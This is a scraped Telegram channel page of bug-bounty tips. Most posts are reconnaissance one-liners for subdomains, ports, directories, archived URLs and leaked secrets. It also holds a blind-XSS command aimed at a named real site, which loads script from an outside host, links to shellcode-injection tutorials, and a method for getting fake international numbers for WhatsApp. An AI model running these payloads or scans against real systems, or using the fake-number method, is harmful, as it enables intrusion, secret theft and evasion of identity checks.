Bug bounty Tips

Ir al canal en Telegram

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

India57 495 Tecnologías y Aplicaciones17 373

5 839

Suscriptores

+1624 horas

+677 días

+37530 días

473

Visitas de la publicación

~ 24224 horas

~ 32348 horas

8.10%

Tasa de compromiso

~ 3

Mensajes por día

Ads index

beta

Archivo de publicaciones

5 839

if you want to grab the ip after ASN Record u can use this oneline

whois -h whois.radb.net -- '-i origin AS8983' | grep -Eo "([0-9.]+){4}/[0-9]+" | uniq -u > ipranges.txt && cat ipranges.txt | mapcidr -silent | dnsx -ptr -resp-only | sort -u > ptrrecords.txt && cat ptrrecords.txt | anew -q subs.txt

5 839

Methodology one : First step collect as much as subdomains you can.i use subfinder with my all api keys virustotal,censys,shodan etc no need many other tool for subdomains finding its enough with all api keys + crt.sh manual+automation -recursive flag used for fetching domain of subdomains its called sub sub domains example amazon.amazoncloud.amazon.com many people miss this part and -all switch from its fetch all api from all sources with all api keys subfinder -d google.com -all -recursive > subdomain.txt This oneliner fetch all subdomains from crt.sh curl -s https://crt.sh/\?q\=\amazon.com\&output\=json | jq -r '.[].name_value' | grep -Po '(\w+\.\w+\.\w+)$' Normaly people use httpx default command and they only filter subdomains with port 443 or 80 but many domains contains dashboard or control pannel and login pannel at 8080,8888,8000 port so always include these ports.. cat subdomains.txt | httpx-toolkit -ports 80,8080,8000,8888 -threads 200 > subdomains_alive.txt For checking open ports i used naabu its very fast by this i can check the result of open ports and what service is running on that port is it contain any vulnerable version so i exploit that service thats why port enumeration is important naabu -list subdomains.txt -c 50 -nmap-cli 'nmap -sV -sC' -o naabu-full.txt And for Checking any hidden Directory and files i used dirsearch with onelist for all list that contains many directory and filess used in web and include only status code that one is important..by this you can find many senstive discloure of files and directory i dont use ffuf bcz its give result with lots of waste things and its also blocked by the domains for its fast bruteforcing..thats why i like dirsearch with colorfull and clean output and less errors. dirsearch -l subdomains_alive.txt -i 200,204,403 -x 500,502,429 -R 5 --random-agent -t 50 -F -w /home/coffinxp/oneforall/onelistforallshort.txt -o directory.txt Now for fetching all urls from archive from many source i used gau rather then wayback bcz it use many sources and its all passive you can use katana for active urls and anew with that files.after use uro to filter out duplicates params.. cat subdomains_alive.txt | gau > newparms.txt cat newparms.txt | uro > filterparm.txt And for js files that contains senstive keyss and pass i used grep command you can also fetch it by katana by -jc flag for active js endpoint. cat filterparam.txt | grep ".js$" > jsfiles.txt and for secret keys i used one liner secret finder or you can send it to nuclei custom secret finder that give clean result i will send u that. cat jsfiles.txt | while read url; do python3 /home/coffinxp/SecretFinder/SecretFinder.py -i $url -o cli >> secret.txt; done and then grep all keyss cat secret.txt | grep aws cat secret.txt | grep goole captcha cat secret.txt | grep twilio and in last i send all param to nuclei that contains all types of vulnerability with my custom templates i will share with you all soon after adding more.. before this if you want seperate vulnerability and find with any other tool for specially made for that purpose like for xss use dalfox,for openredirect use openredirex, for lfi use dotdotpwn & lfi suite..filter these with Gf pattren so you only get valid params for that vulnerability and send to nuclei with that specific vulnerability tags --tags xss nuclei -list sorted_wordlist_100000.txt -t /home/coffinxp/Custom-Nuclei-Templates/

5 839

.Bug Hunting methodology ------------------------------------------------------------------------- subfinder -d viator.com -all -recursive > subdomain.txt cat subdomain.txt | httpx-toolkit -ports 80,443,8080,8000,8888 -threads 200 > subdomains_alive.txt katana -u subdomains_alive.txt -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -kf -jc -fx -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -o allurls.txt cat allurls.txt | grep -E "\.txt|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.json|\.gz|\.rar|\.zip|\.config" cat allurls.txt | grep -E "\.js$" >> js.txt cat alljs.txt | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/ echo www.viator.com | katana -ps | grep -E "\.js$" | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/ -c 30 dirsearch -u https://www.viator.com -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,http://sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js.,.json subfinder -d viator.com | httpx-toolkit -silent | katana -ps -f qurl | gf xss | bxss -appendMode -payload '"><script src=https://xss.report/c/coffinxp></script>' -parameters subzy run --targets subdomains.txt --concurrency 100 --hide_fails --verify_ssl python3 corsy.py -i /home/coffinxp/vaitor/subdomains_alive.txt -t 10 --headers "User-Agent: GoogleBot\nCookie: SESSION=Hacked" nuclei -list subdomains_alive.txt -t /home/coffinxp/Priv8-Nuclei/cors nuclei -list ~/vaitor/subdomains_alive.txt -tags cves,osint,tech cat allurls.txt | gf lfi | nuclei -tags lfi cat allurls.txt | gf redirect | openredirex -p /home/coffinxp/openRedirect

5 839

#Tutorial Shellcode Injection in C# Shellcode Injection in C# - Part 1 - Process Injection Shellcode Injection in C# - Part 2 - Process Hollowing Shellcode Injection in C# - Part 3 - QueueUserAPC | EarlyBird Credit: https://t.me/Devexploit

5 839

5 839

https://blog.securitybreached.org/2023/08/18/bug-bounty-blueprint-a-beginners-guide/

5 839

🧵 A Guide to Starting Your Bug Bounty Journey 1/ 🐞 Don't focus too much on CTFs. The bugs you find there rarely exist in real targets. CTFs are great for learning, but real-world hunting is a different game. 2/ 🏆 Avoid starting on platforms like HackerOne, Bugcrowd, or Intigriti. The competition is fierce, making it tough to find your first bug. Start with Vulnerability Disclosure Programs (VDPs) instead. You'll have a better chance and less discouragement. 3/ 🔍 Focus on one type of vulnerability at a time. IDOR is a great starting point. Master one attack vector before moving to the next, like SSRF, XSS, SSTI, or RCE. Specialization helps build strong skills. 4/ 💡 Be smart about where to inject your payloads. Tailor them to your target's tech stack. For APIs, use backend-specific payloads. Avoid generic payloads that don't match the target's technology. 5/ 📚 Read hacktivity on platforms like HackerOne. These are real bugs on real targets. It's one of the best ways to learn effective attack methods. 6/ 🛠️ Don't rely on default nuclei templates. Create custom ones to avoid duplicates. Customization can give you an edge. 7/ 🤝 Collaborate with experienced hackers. Learn from those who have already found vulnerabilities. Knowledge sharing is invaluable. 8/ 🐦 Join Twitter (or X). Top hackers share tons of valuable information there. Take notes, ask questions, and don't be shy. The worst that can happen is no response, and that's okay. 9/ 💸 Avoid paid tools as a beginner. First, learn the ropes. Once you start earning, consider investing in them. Smart investments come after gaining knowledge and experience. 10/ 🔍 Master Google dorking. It's a crucial skill for any hacker. The ability to find sensitive information through search engines is invaluable. 11/ 🛠️ Found an exploit on Google Hacking Database? Verify it! Ensure the target uses the relevant tech stack. Use Docker to replicate the environment and test the exploit on your local setup. This method sets apart pros from script kiddies. 12/ 🧠 Learn some coding. Understanding the technology you're hacking is essential. Each exploit is different, and knowing the tech helps you adapt your approach. 13/ 🔥 Success in bug bounties comes with hard work. Read source code, understand endpoints, and go beyond brute-forcing. Dedication and effort pay off. If you’re willing to put in the work, you can achieve significant success. 14/ 🌟 Remember, it's a marathon, not a sprint. With persistence and smart strategies, you can achieve your goals. If I can do it, so can you. Let's get to work! 🚀 #BugBounty #CyberSecurity #Hacking

5 839

TOOLSIG (INSTAGRAM TOOLS) DEFAULT OR BASIC USAGE $

git clone https://github.com/officialputuid/toolsig.git
$ cd toolsig
$ npm i
$ node index.js

TUTORIAL ON PC/LAPTOP [OS] #

Download & Install Git for Windows (32/64bit)
# Download & Install NodeJs for Windows (Recommend Use NodeJS LTS (32/64bit))
# Download File toolsig (https://s.id/2yGC6) & Extract the file
# Right Click (Mouse/Touchpad) In "toolsig-master" Folder & Choose Git Bash Here!
$ npm i
$ node index.js

TUTORIAL ON TERMUX [ANDROID] $

pkg upgrade && pkg update
$ pkg install git
$ pkg install nodejs-lts
$ git clone https://github.com/officialputuid/toolsig.git
$ cd toolsig
$ npm i
$ node index.js

Tutorial on C9io/CodeAnywhere [WEB-CLOUD-BASED] $

Login c9.io/login | https://codeanywhere.com/login
$ Select & Install Workspace + Package NodeJS
$ git clone https://github.com/officialputuid/toolsig.git
$ cd toolsig
$ npm i
$ node index.js

5 839

😄

5 839

😄

5 839

😄

5 839

📂 𝗧𝗘𝗥𝗠𝗨𝗫 𝗖𝗢𝗠𝗣𝗟𝗘𝗧𝗘 𝗔𝗡𝗗𝗥𝗢𝗜𝗗 𝗘𝗧𝗛𝗜𝗖𝗔𝗟 𝗛𝗔𝗖𝗞𝗜𝗡𝗚 𝗧𝗨𝗧𝗢𝗥𝗜𝗔𝗟 📂 🖥 Description : The Termux Complete Android Ethical Hacking Tutorial is a comprehensive guide that teaches users how to use the Termux app on their Android devices for ethical hacking purposes. The tutorial covers various hacking techniques and tools that can be used within the Termux environment, including information gathering, vulnerability scanning, password cracking, network monitoring, and more. It provides step-by-step instructions, commands, and examples to help users understand and apply these techniques effectively. This tutorial is suitable for beginners and intermediate users who are interested in learning ethical hacking on their Android devices

5 839

FAKE INTERNATIONAL NUMBERS MAKING METHOD 1. Download Any 2nd WhatsApp 2. Download https://2ndline-second-phone-number.en.softonic.com/android/download Download APK Not On Playstore 3.After Download Create Give Any Gmail Account And Password 4.Then Give All Access But Location Ki Access Nahi Dena 5.Country Code Me 705 Daalna And Next 6. Choose Any Number 7. Done You Create Number Successful 8. Go Any 2nd WhatsApp And Paste Your International Number And Country Code Is +1 9. OTP By Call Krna First Time Otp Nahi Aayega 2 Min Wait Krna Again Resend Otp On Call Call Aayega OTP Daal Dena 10. Now Your International WhatsApp Is Done

5 839

😄

5 839

5 839

Repost from Myself_IMMORTAL

5 839

😄

5 839

check this out guys